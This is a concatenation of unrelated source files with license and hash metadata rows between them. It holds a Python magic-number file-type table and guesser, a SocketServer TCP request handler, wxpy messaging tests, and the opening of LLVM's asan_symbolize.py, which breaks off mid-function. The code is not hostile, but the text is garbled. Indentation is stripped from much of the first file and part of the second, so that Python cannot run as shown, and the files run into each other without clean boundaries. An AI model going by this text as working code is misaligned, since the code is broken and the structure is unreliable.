[0L, 'string', '=', '#! rnews', 'batched news text'],
[0L, 'string', '=', 'N#! rnews', 'mailed, batched news text'],
[0L, 'string', '=', 'Forward to', 'mail forwarding text'],
[0L, 'string', '=', 'Pipe to', 'mail piping text'],
[0L, 'string', '=', 'Return-Path:', 'message/rfc822'],
[0L, 'string', '=', 'Path:', 'message/news'],
[0L, 'string', '=', 'Xref:', 'message/news'],
[0L, 'string', '=', 'From:', 'message/rfc822'],
[0L, 'string', '=', 'Article', 'message/news'],
[0L, 'string', '=', 'BABYL', 'message/x-gnu-rmail'],
[0L, 'string', '=', 'Received:', 'message/rfc822'],
[0L, 'string', '=', 'MIME-Version:', 'MIME entity text'],
[0L, 'string', '=', 'Content-Type: ', ''],
[0L, 'string', '=', 'Content-Type:', ''],
[0L, 'long', '=', 31415L, 'Mirage Assembler m.out executable'],
[0L, 'string', '=', '\311\304', 'ID tags data'],
[0L, 'string', '=', '\001\001\001\001', 'MMDF mailbox'],
[4L, 'string', '=', 'Research,', 'Digifax-G3-File'],
[0L, 'short', '=', 256L, 'raw G3 data, byte-padded'],
[0L, 'short', '=', 5120L, 'raw G3 data'],
[0L, 'string', '=', 'RMD1', 'raw modem data'],
[0L, 'string', '=', 'PVF1\012', 'portable voice format'],
[0L, 'string', '=', 'PVF2\012', 'portable voice format'],
[0L, 'beshort', '=', 520L, 'mc68k COFF'],
[0L, 'beshort', '=', 521L, 'mc68k executable (shared)'],
[0L, 'beshort', '=', 522L, 'mc68k executable (shared demand paged)'],
[0L, 'beshort', '=', 554L, '68K BCS executable'],
[0L, 'beshort', '=', 555L, '88K BCS executable'],
[0L, 'string', '=', 'S0', 'Motorola S-Record; binary data in text format'],
[0L, 'string', '=', '@echo off', 'MS-DOS batch file text'],
[128L, 'string', '=', 'PE\000\000', 'MS Windows PE'],
[0L, 'leshort', '=', 332L, 'MS Windows COFF Intel 80386 object file'],
[0L, 'leshort', '=', 358L, 'MS Windows COFF MIPS R4000 object file'],
[0L, 'leshort', '=', 388L, 'MS Windows COFF Alpha object file'],
[0L, 'leshort', '=', 616L, 'MS Windows COFF Motorola 68000 object file'],
[0L, 'leshort', '=', 496L, 'MS Windows COFF PowerPC object file'],
[0L, 'leshort', '=', 656L, 'MS Windows COFF PA-RISC object file'],
[0L, 'string', '=', 'MZ', 'application/x-ms-dos-executable'],
[0L, 'string', '=', 'LZ', 'MS-DOS executable (built-in)'],
[0L, 'string', '=', 'regf', 'Windows NT Registry file'],
[2080L, 'string', '=', 'Microsoft Word 6.0 Document', 'text/vnd.ms-word'],
[2080L, 'string', '=', 'Documento Microsoft Word 6', 'text/vnd.ms-word'],
[2112L, 'string', '=', 'MSWordDoc', 'text/vnd.ms-word'],
[0L, 'belong', '=', 834535424L, 'text/vnd.ms-word'],
[0L, 'string', '=', 'PO^Q`', 'text/vnd.ms-word'],
[2080L, 'string', '=', 'Microsoft Excel 5.0 Worksheet', 'application/vnd.ms-excel'],
[2114L, 'string', '=', 'Biff5', 'application/vnd.ms-excel'],
[0L, 'belong', '=', 6656L, 'Lotus 1-2-3'],
[0L, 'belong', '=', 512L, 'Lotus 1-2-3'],
[1L, 'string', '=', 'WPC', 'text/vnd.wordperfect'],
[0L, 'beshort', '=', 610L, 'Tower/XP rel 2 object'],
[0L, 'beshort', '=', 615L, 'Tower/XP rel 2 object'],
[0L, 'beshort', '=', 620L, 'Tower/XP rel 3 object'],
[0L, 'beshort', '=', 625L, 'Tower/XP rel 3 object'],
[0L, 'beshort', '=', 630L, 'Tower32/600/400 68020 object'],
[0L, 'beshort', '=', 640L, 'Tower32/800 68020'],
[0L, 'beshort', '=', 645L, 'Tower32/800 68010'],
[0L, 'lelong', '=', 407L, 'NetBSD little-endian object file'],
[0L, 'belong', '=', 407L, 'NetBSD big-endian object file'],
[0L, 'belong&0377777777', '=', 41400413L, 'NetBSD/i386 demand paged'],
[0L, 'belong&0377777777', '=', 41400410L, 'NetBSD/i386 pure'],
[0L, 'belong&0377777777', '=', 41400407L, 'NetBSD/i386'],
[0L, 'belong&0377777777', '=', 41400507L, 'NetBSD/i386 core'],
[0L, 'belong&0377777777', '=', 41600413L, 'NetBSD/m68k demand paged'],
[0L, 'belong&0377777777', '=', 41600410L, 'NetBSD/m68k pure'],
[0L, 'belong&0377777777', '=', 41600407L, 'NetBSD/m68k'],
[0L, 'belong&0377777777', '=', 41600507L, 'NetBSD/m68k core'],
[0L, 'belong&0377777777', '=', 42000413L, 'NetBSD/m68k4k demand paged'],
[0L, 'belong&0377777777', '=', 42000410L, 'NetBSD/m68k4k pure'],
[0L, 'belong&0377777777', '=', 42000407L, 'NetBSD/m68k4k'],
[0L, 'belong&0377777777', '=', 42000507L, 'NetBSD/m68k4k core'],
[0L, 'belong&0377777777', '=', 42200413L, 'NetBSD/ns32532 demand paged'],
[0L, 'belong&0377777777', '=', 42200410L, 'NetBSD/ns32532 pure'],
[0L, 'belong&0377777777', '=', 42200407L, 'NetBSD/ns32532'],
[0L, 'belong&0377777777', '=', 42200507L, 'NetBSD/ns32532 core'],
[0L, 'belong&0377777777', '=', 42400413L, 'NetBSD/sparc demand paged'],
[0L, 'belong&0377777777', '=', 42400410L, 'NetBSD/sparc pure'],
[0L, 'belong&0377777777', '=', 42400407L, 'NetBSD/sparc'],
[0L, 'belong&0377777777', '=', 42400507L, 'NetBSD/sparc core'],
[0L, 'belong&0377777777', '=', 42600413L, 'NetBSD/pmax demand paged'],
[0L, 'belong&0377777777', '=', 42600410L, 'NetBSD/pmax pure'],
[0L, 'belong&0377777777', '=', 42600407L, 'NetBSD/pmax'],
[0L, 'belong&0377777777', '=', 42600507L, 'NetBSD/pmax core'],
[0L, 'belong&0377777777', '=', 43000413L, 'NetBSD/vax demand paged'],
[0L, 'belong&0377777777', '=', 43000410L, 'NetBSD/vax pure'],
[0L, 'belong&0377777777', '=', 43000407L, 'NetBSD/vax'],
[0L, 'belong&0377777777', '=', 43000507L, 'NetBSD/vax core'],
[0L, 'lelong', '=', 459141L, 'ECOFF NetBSD/alpha binary'],
[0L, 'belong&0377777777', '=', 43200507L, 'NetBSD/alpha core'],
[0L, 'belong&0377777777', '=', 43400413L, 'NetBSD/mips demand paged'],
[0L, 'belong&0377777777', '=', 43400410L, 'NetBSD/mips pure'],
[0L, 'belong&0377777777', '=', 43400407L, 'NetBSD/mips'],
[0L, 'belong&0377777777', '=', 43400507L, 'NetBSD/mips core'],
[0L, 'belong&0377777777', '=', 43600413L, 'NetBSD/arm32 demand paged'],
[0L, 'belong&0377777777', '=', 43600410L, 'NetBSD/arm32 pure'],
[0L, 'belong&0377777777', '=', 43600407L, 'NetBSD/arm32'],
[0L, 'belong&0377777777', '=', 43600507L, 'NetBSD/arm32 core'],
[0L, 'string', '=', 'StartFontMetrics', 'font/x-sunos-news'],
[0L, 'string', '=', 'StartFont', 'font/x-sunos-news'],
[0L, 'belong', '=', 326773060L, 'font/x-sunos-news'],
[0L, 'belong', '=', 326773063L, 'font/x-sunos-news'],
[0L, 'belong', '=', 326773072L, 'font/x-sunos-news'],
[0L, 'belong', '=', 326773073L, 'font/x-sunos-news'],
[8L, 'belong', '=', 326773573L, 'font/x-sunos-news'],
[8L, 'belong', '=', 326773576L, 'font/x-sunos-news'],
[0L, 'string', '=', 'Octave-1-L', 'Octave binary data (little endian)'],
[0L, 'string', '=', 'Octave-1-B', 'Octave binary data (big endian)'],
[0L, 'string', '=', '\177OLF', 'OLF'],
[0L, 'beshort', '=', 34765L, 'OS9/6809 module:'],
[0L, 'beshort', '=', 19196L, 'OS9/68K module:'],
[0L, 'long', '=', 61374L, 'OSF/Rose object'],
[0L, 'short', '=', 565L, 'i386 COFF object'],
[0L, 'short', '=', 10775L, '"compact bitmap" format (Poskanzer)'],
[0L, 'string', '=', '%PDF-', 'PDF document'],
[0L, 'lelong', '=', 101555L, 'PDP-11 single precision APL workspace'],
[0L, 'lelong', '=', 101554L, 'PDP-11 double precision APL workspace'],
[0L, 'leshort', '=', 407L, 'PDP-11 executable'],
[0L, 'leshort', '=', 401L, 'PDP-11 UNIX/RT ldp'],
[0L, 'leshort', '=', 405L, 'PDP-11 old overlay'],
[0L, 'leshort', '=', 410L, 'PDP-11 pure executable'],
[0L, 'leshort', '=', 411L, 'PDP-11 separate I&D executable'],
[0L, 'leshort', '=', 437L, 'PDP-11 kernel overlay'],
[0L, 'beshort', '=', 39168L, 'PGP key public ring'],
[0L, 'beshort', '=', 38145L, 'PGP key security ring'],
[0L, 'beshort', '=', 38144L, 'PGP key security ring'],
[0L, 'beshort', '=', 42496L, 'PGP encrypted data'],
[0L, 'string', '=', '-----BEGIN PGP', 'PGP armored data'],
[0L, 'string', '=', '# PaCkAgE DaTaStReAm', 'pkg Datastream (SVR4)'],
[0L, 'short', '=', 601L, 'mumps avl global'],
[0L, 'short', '=', 602L, 'mumps blt global'],
[0L, 'string', '=', '%!', 'application/postscript'],
[0L, 'string', '=', '\004%!', 'application/postscript'],
[0L, 'belong', '=', 3318797254L, 'DOS EPS Binary File'],
[0L, 'string', '=', '*PPD-Adobe:', 'PPD file'],
[0L, 'string', '=', '\033%-12345X@PJL', 'HP Printer Job Language data'],
[0L, 'string', '=', '\033%-12345X@PJL', 'HP Printer Job Language data'],
[0L, 'string', '=', '\033E\033', 'image/x-pcl-hp'],
[0L, 'string', '=', '@document(', 'Imagen printer'],
[0L, 'string', '=', 'Rast', 'RST-format raster font data'],
[0L, 'belong&0xff00ffff', '=', 1442840576L, 'ps database'],
[0L, 'long', '=', 1351614727L, 'Pyramid 90x family executable'],
[0L, 'long', '=', 1351614728L, 'Pyramid 90x family pure executable'],
[0L, 'long', '=', 1351614731L, 'Pyramid 90x family demand paged pure executable'],
[0L, 'beshort', '=', 60843L, ''],
[0L, 'string', '=', '{\\\\rtf', 'Rich Text Format data,'],
[38L, 'string', '=', 'Spreadsheet', 'sc spreadsheet file'],
[8L, 'string', '=', '\001s SCCS', 'archive data'],
[0L, 'byte', '=', 46L, 'Sendmail frozen configuration'],
[0L, 'short', '=', 10012L, 'Sendmail frozen configuration'],
[0L, 'lelong', '=', 234L, 'BALANCE NS32000 .o'],
[0L, 'lelong', '=', 4330L, 'BALANCE NS32000 executable (0 @ 0)'],
[0L, 'lelong', '=', 8426L, 'BALANCE NS32000 executable (invalid @ 0)'],
[0L, 'lelong', '=', 12522L, 'BALANCE NS32000 standalone executable'],
[0L, 'leshort', '=', 4843L, 'SYMMETRY i386 .o'],
[0L, 'leshort', '=', 8939L, 'SYMMETRY i386 executable (0 @ 0)'],
[0L, 'leshort', '=', 13035L, 'SYMMETRY i386 executable (invalid @ 0)'],
[0L, 'leshort', '=', 17131L, 'SYMMETRY i386 standalone executable'],
[0L, 'string', '=', 'kbd!map', 'kbd map file'],
[0L, 'belong', '=', 407L, 'old SGI 68020 executable'],
[0L, 'belong', '=', 410L, 'old SGI 68020 pure executable'],
[0L, 'beshort', '=', 34661L, 'disk quotas file'],
[0L, 'beshort', '=', 1286L, 'IRIS Showcase file'],
[0L, 'beshort', '=', 550L, 'IRIS Showcase template'],
[0L, 'belong', '=', 1396917837L, 'IRIS Showcase file'],
[0L, 'belong', '=', 1413695053L, 'IRIS Showcase template'],
[0L, 'belong', '=', 3735927486L, 'IRIX Parallel Arena'],
[0L, 'beshort', '=', 352L, 'MIPSEB COFF executable'],
[0L, 'beshort', '=', 354L, 'MIPSEL COFF executable'],
[0L, 'beshort', '=', 24577L, 'MIPSEB-LE COFF executable'],
[0L, 'beshort', '=', 25089L, 'MIPSEL-LE COFF executable'],
[0L, 'beshort', '=', 355L, 'MIPSEB MIPS-II COFF executable'],
[0L, 'beshort', '=', 358L, 'MIPSEL MIPS-II COFF executable'],
[0L, 'beshort', '=', 25345L, 'MIPSEB-LE MIPS-II COFF executable'],
[0L, 'beshort', '=', 26113L, 'MIPSEL-LE MIPS-II COFF executable'],
[0L, 'beshort', '=', 320L, 'MIPSEB MIPS-III COFF executable'],
[0L, 'beshort', '=', 322L, 'MIPSEL MIPS-III COFF executable'],
[0L, 'beshort', '=', 16385L, 'MIPSEB-LE MIPS-III COFF executable'],
[0L, 'beshort', '=', 16897L, 'MIPSEL-LE MIPS-III COFF executable'],
[0L, 'beshort', '=', 384L, 'MIPSEB Ucode'],
[0L, 'beshort', '=', 386L, 'MIPSEL Ucode'],
[0L, 'belong', '=', 3735924144L, 'IRIX core dump'],
[0L, 'belong', '=', 3735924032L, 'IRIX 64-bit core dump'],
[0L, 'belong', '=', 3133063355L, 'IRIX N32 core dump'],
[0L, 'string', '=', 'CrshDump', 'IRIX vmcore dump of'],
[0L, 'string', '=', 'SGIAUDIT', 'SGI Audit file'],
[0L, 'string', '=', 'WNGZWZSC', 'Wingz compiled script'],
[0L, 'string', '=', 'WNGZWZSS', 'Wingz spreadsheet'],
[0L, 'string', '=', 'WNGZWZHP', 'Wingz help file'],
[0L, 'string', '=', '\\#Inventor', 'V IRIS Inventor 1.0 file'],
[0L, 'string', '=', '\\#Inventor', 'V2 Open Inventor 2.0 file'],
[0L, 'string', '=', 'glfHeadMagic();', 'GLF_TEXT'],
[4L, 'belong', '=', 1090584576L, 'GLF_BINARY_LSB_FIRST'],
[4L, 'belong', '=', 321L, 'GLF_BINARY_MSB_FIRST'],
[0L, 'string', '=', '<!DOCTYPE HTML', 'text/html'],
[0L, 'string', '=', '<!doctype html', 'text/html'],
[0L, 'string', '=', '<HEAD', 'text/html'],
[0L, 'string', '=', '<head', 'text/html'],
[0L, 'string', '=', '<TITLE', 'text/html'],
[0L, 'string', '=', '<title', 'text/html'],
[0L, 'string', '=', '<html', 'text/html'],
[0L, 'string', '=', '<HTML', 'text/html'],
[0L, 'string', '=', '<?xml', 'application/xml'],
[0L, 'string', '=', '<!DOCTYPE', 'exported SGML document text'],
[0L, 'string', '=', '<!doctype', 'exported SGML document text'],
[0L, 'string', '=', '<!SUBDOC', 'exported SGML subdocument text'],
[0L, 'string', '=', '<!subdoc', 'exported SGML subdocument text'],
[0L, 'string', '=', '<!--', 'exported SGML document text'],
[0L, 'string', '=', 'RTSS', 'NetMon capture file'],
[0L, 'string', '=', 'TRSNIFF data \032', 'Sniffer capture file'],
[0L, 'string', '=', 'XCP\000', 'NetXRay capture file'],
[0L, 'ubelong', '=', 2712847316L, 'tcpdump capture file (big-endian)'],
[0L, 'ulelong', '=', 2712847316L, 'tcpdump capture file (little-endian)'],
[0L, 'string', '=', '<!SQ DTD>', 'Compiled SGML rules file'],
[0L, 'string', '=', '<!SQ A/E>', 'A/E SGML Document binary'],
[0L, 'string', '=', '<!SQ STS>', 'A/E SGML binary styles file'],
[0L, 'short', '=', 49374L, 'Compiled PSI (v1) data'],
[0L, 'short', '=', 49370L, 'Compiled PSI (v2) data'],
[0L, 'short', '=', 125252L, 'SoftQuad DESC or font file binary'],
[0L, 'string', '=', 'SQ BITMAP1', 'SoftQuad Raster Format text'],
[0L, 'string', '=', 'X SoftQuad', 'troff Context intermediate'],
[0L, 'belong&077777777', '=', 600413L, 'sparc demand paged'],
[0L, 'belong&077777777', '=', 600410L, 'sparc pure'],
[0L, 'belong&077777777', '=', 600407L, 'sparc'],
[0L, 'belong&077777777', '=', 400413L, 'mc68020 demand paged'],
[0L, 'belong&077777777', '=', 400410L, 'mc68020 pure'],
[0L, 'belong&077777777', '=', 400407L, 'mc68020'],
[0L, 'belong&077777777', '=', 200413L, 'mc68010 demand paged'],
[0L, 'belong&077777777', '=', 200410L, 'mc68010 pure'],
[0L, 'belong&077777777', '=', 200407L, 'mc68010'],
[0L, 'belong', '=', 407L, 'old sun-2 executable'],
[0L, 'belong', '=', 410L, 'old sun-2 pure executable'],
[0L, 'belong', '=', 413L, 'old sun-2 demand paged executable'],
[0L, 'belong', '=', 525398L, 'SunOS core file'],
[0L, 'long', '=', 4197695630L, 'SunPC 4.0 Hard Disk'],
[0L, 'string', '=', '#SUNPC_CONFIG', 'SunPC 4.0 Properties Values'],
[0L, 'string', '=', 'snoop', 'Snoop capture file'],
[36L, 'string', '=', 'acsp', 'Kodak Color Management System, ICC Profile'],
[0L, 'string', '=', '#!teapot\012xdr', 'teapot work sheet (XDR format)'],
[0L, 'string', '=', '\032\001', 'Compiled terminfo entry'],
[0L, 'short', '=', 433L, 'Curses screen image'],
[0L, 'short', '=', 434L, 'Curses screen image'],
[0L, 'string', '=', '\367\002', 'TeX DVI file'],
[0L, 'string', '=', '\367\203', 'font/x-tex'],
[0L, 'string', '=', '\367Y', 'font/x-tex'],
[0L, 'string', '=', '\367\312', 'font/x-tex'],
[0L, 'string', '=', 'This is TeX,', 'TeX transcript text'],
[0L, 'string', '=', 'This is METAFONT,', 'METAFONT transcript text'],
[2L, 'string', '=', '\000\021', 'font/x-tex-tfm'],
[2L, 'string', '=', '\000\022', 'font/x-tex-tfm'],
[0L, 'string', '=', '\\\\input\\', 'texinfo Texinfo source text'],
[0L, 'string', '=', 'This is Info file', 'GNU Info text'],
[0L, 'string', '=', '\\\\input', 'TeX document text'],
[0L, 'string', '=', '\\\\section', 'LaTeX document text'],
[0L, 'string', '=', '\\\\setlength', 'LaTeX document text'],
[0L, 'string', '=', '\\\\documentstyle', 'LaTeX document text'],
[0L, 'string', '=', '\\\\chapter', 'LaTeX document text'],
[0L, 'string', '=', '\\\\documentclass', 'LaTeX 2e document text'],
[0L, 'string', '=', '\\\\relax', 'LaTeX auxiliary file'],
[0L, 'string', '=', '\\\\contentsline', 'LaTeX table of contents'],
[0L, 'string', '=', '\\\\indexentry', 'LaTeX raw index file'],
[0L, 'string', '=', '\\\\begin{theindex}', 'LaTeX sorted index'],
[0L, 'string', '=', '\\\\glossaryentry', 'LaTeX raw glossary'],
[0L, 'string', '=', '\\\\begin{theglossary}', 'LaTeX sorted glossary'],
[0L, 'string', '=', 'This is makeindex', 'Makeindex log file'],
[0L, 'string', '=', '**TI82**', 'TI-82 Graphing Calculator'],
[0L, 'string', '=', '**TI83**', 'TI-83 Graphing Calculator'],
[0L, 'string', '=', '**TI85**', 'TI-85 Graphing Calculator'],
[0L, 'string', '=', '**TI92**', 'TI-92 Graphing Calculator'],
[0L, 'string', '=', '**TI80**', 'TI-80 Graphing Calculator File.'],
[0L, 'string', '=', '**TI81**', 'TI-81 Graphing Calculator File.'],
[0L, 'string', '=', 'TZif', 'timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\001\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\002\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\003\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\004\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\005\000', 'old timezone data'],
[0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\006\000', 'old timezone data'],
[0L, 'string', '=', '.\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', '\'\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', '\'.\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', '\\\\"', 'troff or preprocessor input text'],
[0L, 'string', '=', 'x T', 'ditroff text'],
[0L, 'string', '=', '@\357', 'very old (C/A/T) troff output data'],
[0L, 'string', '=', 'Interpress/Xerox', 'Xerox InterPress data'],
[0L, 'short', '=', 263L, 'unknown machine executable'],
[0L, 'short', '=', 264L, 'unknown pure executable'],
[0L, 'short', '=', 265L, 'PDP-11 separate I&D'],
[0L, 'short', '=', 267L, 'unknown pure executable'],
[0L, 'long', '=', 268L, 'unknown demand paged pure executable'],
[0L, 'long', '=', 269L, 'unknown demand paged pure executable'],
[0L, 'long', '=', 270L, 'unknown readable demand paged pure executable'],
[0L, 'string', '=', 'begin uuencoded', 'or xxencoded text'],
[0L, 'string', '=', 'xbtoa Begin', "btoa'd text"],
[0L, 'string', '=', '$\012ship', "ship'd binary text"],
[0L, 'string', '=', 'Decode the following with bdeco', 'bencoded News text'],
[11L, 'string', '=', 'must be converted with BinHex', 'BinHex binary text'],
[0L, 'short', '=', 610L, 'Perkin-Elmer executable'],
[0L, 'beshort', '=', 572L, 'amd 29k coff noprebar executable'],
[0L, 'beshort', '=', 1572L, 'amd 29k coff prebar executable'],
[0L, 'beshort', '=', 160007L, 'amd 29k coff archive'],
[6L, 'beshort', '=', 407L, 'unicos (cray) executable'],
[596L, 'string', '=', 'X\337\377\377', 'Ultrix core file'],
[0L, 'string', '=', 'Joy!peffpwpc', 'header for PowerPC PEF executable'],
[0L, 'lelong', '=', 101557L, 'VAX single precision APL workspace'],
[0L, 'lelong', '=', 101556L, 'VAX double precision APL workspace'],
[0L, 'lelong', '=', 407L, 'VAX executable'],
[0L, 'lelong', '=', 410L, 'VAX pure executable'],
[0L, 'lelong', '=', 413L, 'VAX demand paged pure executable'],
[0L, 'leshort', '=', 570L, 'VAX COFF executable'],
[0L, 'leshort', '=', 575L, 'VAX COFF pure executable'],
[0L, 'string', '=', 'LBLSIZE=', 'VICAR image data'],
[43L, 'string', '=', 'SFDU_LABEL', 'VICAR label file'],
[0L, 'short', '=', 21845L, 'VISX image file'],
[0L, 'string', '=', '\260\0000\000', 'VMS VAX executable'],
[0L, 'belong', '=', 50331648L, 'VMS Alpha executable'],
[1L, 'string', '=', 'WPC', '(Corel/WP)'],
[0L, 'string', '=', 'core', 'core file (Xenix)'],
[0L, 'byte', '=', 128L, '8086 relocatable (Microsoft)'],
[0L, 'leshort', '=', 65381L, 'x.out'],
[0L, 'leshort', '=', 518L, 'Microsoft a.out'],
[0L, 'leshort', '=', 320L, 'old Microsoft 8086 x.out'],
[0L, 'lelong', '=', 518L, 'b.out'],
[0L, 'leshort', '=', 1408L, 'XENIX 8086 relocatable or 80286 small model'],
[0L, 'long', '=', 59399L, 'object file (z8000 a.out)'],
[0L, 'long', '=', 59400L, 'pure object file (z8000 a.out)'],
[0L, 'long', '=', 59401L, 'separate object file (z8000 a.out)'],
[0L, 'long', '=', 59397L, 'overlay object file (z8000 a.out)'],
[0L, 'string', '=', 'ZyXEL\002', 'ZyXEL voice data'],
]
magic_tests = []
for record in magic_database:
magic_tests.append(MagicTest(record[0], record[1], record[2], record[3],
record[4]))
def guess_type(filename):
"""
    Guess the mimetype of a file by examining its contents (magic numbers).
    @param filename: Path of the file to inspect.
    @return: Mimetype string, or a description when no appropriate mime
            type is available.
"""
if not os.path.isfile(filename):
logging.debug('%s is not a file', filename)
return None
try:
data = open(filename, 'r').read(8192)
except Exception, e:
logging.error(str(e))
return None
for test in magic_tests:
        file_type = test.compare(data)
        if file_type:
            return file_type
    # No matching magic number in the database. Is it binary or text?
for c in data:
if ord(c) > 128:
# Non ASCII (binary) data
return 'Data'
# ASCII, do some text tests
    if string.find(data, 'The', 0, 8192) > -1:
        return 'English text'
    if string.find(data, 'def', 0, 8192) > -1:
        return 'Python Source'
return 'ASCII text'
if __name__ == '__main__':
parser = optparse.OptionParser("usage: %prog [options] [filenames]")
options, args = parser.parse_args()
logging_manager.configure_logging(MagicLoggingConfig(), verbose=True)
if not args:
parser.print_help()
sys.exit(1)
for arg in args:
msg = None
if os.path.isfile(arg):
msg = guess_type(arg)
if msg:
logging.info('%s: %s', arg, msg)
else:
logging.info('%s: unknown', arg)
| gpl-2.0 | -6,769,077,660,113,957,000 | 53.685634 | 163 | 0.562151 | false |
lauromoraes/redes | MyTCPRequestHandler.py | 1 | 1443 | import logging
import socket
import threading
import SocketServer
import time
from recvall import *
from calc import *
logging.basicConfig( level = logging.DEBUG, format = "%(name)s: %(message)s", )
class MyTCPRequestHandler(SocketServer.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.logger = logging.getLogger('MyTCPRequestHandler')
self.logger.debug('__init__')
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
return
def setup(self):
self.logger.debug('setup')
return SocketServer.BaseRequestHandler.setup(self)
def handle(self):
self.logger.debug('handle')
data = recvall(self.request, 2)
#print(self.request.accept()[1])
#current_thread = threading.currentThread()
#resp = "%s, %s" % (current_thread.getName(), data)
#self.logger.debug('Thread: %s | recv()->"%s"', current_thread.getName(), data)
#self.logger.debug('Threads: %s' % str( [ t.getName() for t in threading.enumerate()] ) )
resp = calc(data)
sent = 0
size = 1024*5
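        # Send the (possibly large) response back in 5 KB chunks, sleeping
        # briefly between chunks so the client can drain the socket.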
while(sent < len(resp)):
if(sent+size <= len(resp)):
sent += self.request.send(resp[sent:sent+size])
else:
sent += self.request.send(resp[sent:])
time.sleep(0.1)
#self.request.sendall("data")
self.request.shutdown(socket.SHUT_WR)
self.request.close()
#time.sleep(3)
return
def finish(self):
self.logger.debug('finish')
return SocketServer.BaseRequestHandler.finish(self)
| gpl-2.0 | -1,314,863,412,308,185,900 | 29.0625 | 91 | 0.699931 | false |
youfou/wxpy | tests/api/messages/test_message.py | 1 | 2800 | from datetime import datetime
from tests.conftest import wait_for_message
from wxpy import *
def sent_message(sent_msg, msg_type, receiver):
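    """Assertions shared by every SentMessage checked in these tests."""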
assert isinstance(sent_msg, SentMessage)
assert sent_msg.type == msg_type
assert sent_msg.receiver == receiver
assert sent_msg.bot == receiver.bot
assert sent_msg.sender == receiver.bot.self
assert isinstance(sent_msg.receive_time, datetime)
assert isinstance(sent_msg.create_time, datetime)
assert sent_msg.create_time < sent_msg.receive_time
class TestMessage:
def test_text_message(self, group, friend):
sent_message(group.send('text'), TEXT, group)
msg = wait_for_message(group, TEXT)
assert isinstance(msg, Message)
assert msg.type == TEXT
assert msg.text == 'Hello!'
assert not msg.is_at
assert msg.chat == group
assert msg.sender == group
assert msg.receiver == group.self
assert msg.member == friend
assert 0 < msg.latency < 30
group.send('at')
msg = wait_for_message(group, TEXT)
assert msg.is_at
def test_picture_message(self, group, image_path):
sent = group.send_image(image_path)
sent_message(sent, PICTURE, group)
assert sent.path == image_path
def test_video_message(self, group, video_path):
sent = group.send_video(video_path)
sent_message(sent, VIDEO, group)
assert sent.path == video_path
def test_raw_message(self, group):
# 发送名片
raw_type = 42
raw_content = '<msg username="{}" nickname="{}"/>'.format('wxpy_bot', 'wxpy 机器人')
sent_message(group.send_raw_msg(raw_type, raw_content), None, group)
def test_send(self, friend, file_path, image_path, video_path):
text_to_send = 'test sending text'
sent = friend.send(text_to_send)
sent_message(sent, TEXT, friend)
assert sent.text == text_to_send
sent = friend.send('@fil@{}'.format(file_path))
sent_message(sent, ATTACHMENT, friend)
assert sent.path == file_path
sent = friend.send('@img@{}'.format(image_path))
sent_message(sent, PICTURE, friend)
assert sent.path == image_path
sent = friend.send('@vid@{}'.format(video_path))
sent_message(sent, VIDEO, friend)
assert sent.path == video_path
# 发送名片
raw_type = 42
raw_content = '<msg username="{}" nickname="{}"/>'.format('wxpy_bot', 'wxpy 机器人')
uri = '/webwxsendmsg'
sent = friend.send_raw_msg(raw_type, raw_content)
sent_message(sent, None, friend)
assert sent.type is None
assert sent.raw_type == raw_type
assert sent.raw_content == raw_content
assert sent.uri == uri
| mit | -5,514,851,197,585,937,000 | 33.65 | 89 | 0.618326 | false |
ensemblr/llvm-project-boilerplate | include/llvm/projects/compiler-rt/lib/asan/scripts/asan_symbolize.py | 1 | 18097 | #!/usr/bin/env python
#===- lib/asan/scripts/asan_symbolize.py -----------------------------------===#
#
# The LLVM Compiler Infrastructure
#
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
#
#===------------------------------------------------------------------------===#
import argparse
import bisect
import getopt
import os
import re
import subprocess
import sys
symbolizers = {}
DEBUG = False
demangle = False
binutils_prefix = None
sysroot_path = None
binary_name_filter = None
fix_filename_patterns = None
logfile = sys.stdin
allow_system_symbolizer = True
force_system_symbolizer = False
# FIXME: merge the code that calls fix_filename().
def fix_filename(file_name):
if fix_filename_patterns:
for path_to_cut in fix_filename_patterns:
file_name = re.sub('.*' + path_to_cut, '', file_name)
file_name = re.sub('.*asan_[a-z_]*.cc:[0-9]*', '_asan_rtl_', file_name)
file_name = re.sub('.*crtstuff.c:0', '???:0', file_name)
return file_name
def sysroot_path_filter(binary_name):
return sysroot_path + binary_name
def is_valid_arch(s):
return s in ["i386", "x86_64", "x86_64h", "arm", "armv6", "armv7", "armv7s",
"armv7k", "arm64", "powerpc64", "powerpc64le", "s390x", "s390"]
def guess_arch(addr):
# Guess which arch we're running. 10 = len('0x') + 8 hex digits.
if len(addr) > 10:
return 'x86_64'
else:
return 'i386'
class Symbolizer(object):
def __init__(self):
pass
def symbolize(self, addr, binary, offset):
"""Symbolize the given address (pair of binary and offset).
Overriden in subclasses.
Args:
addr: virtual address of an instruction.
binary: path to executable/shared object containing this instruction.
offset: instruction offset in the @binary.
Returns:
list of strings (one string for each inlined frame) describing
the code locations for this instruction (that is, function name, file
name, line and column numbers).
"""
return None
class LLVMSymbolizer(Symbolizer):
def __init__(self, symbolizer_path, default_arch, system, dsym_hints=[]):
super(LLVMSymbolizer, self).__init__()
self.symbolizer_path = symbolizer_path
self.default_arch = default_arch
self.system = system
self.dsym_hints = dsym_hints
self.pipe = self.open_llvm_symbolizer()
def open_llvm_symbolizer(self):
cmd = [self.symbolizer_path,
'--use-symbol-table=true',
'--demangle=%s' % demangle,
'--functions=linkage',
'--inlining=true',
'--default-arch=%s' % self.default_arch]
if self.system == 'Darwin':
for hint in self.dsym_hints:
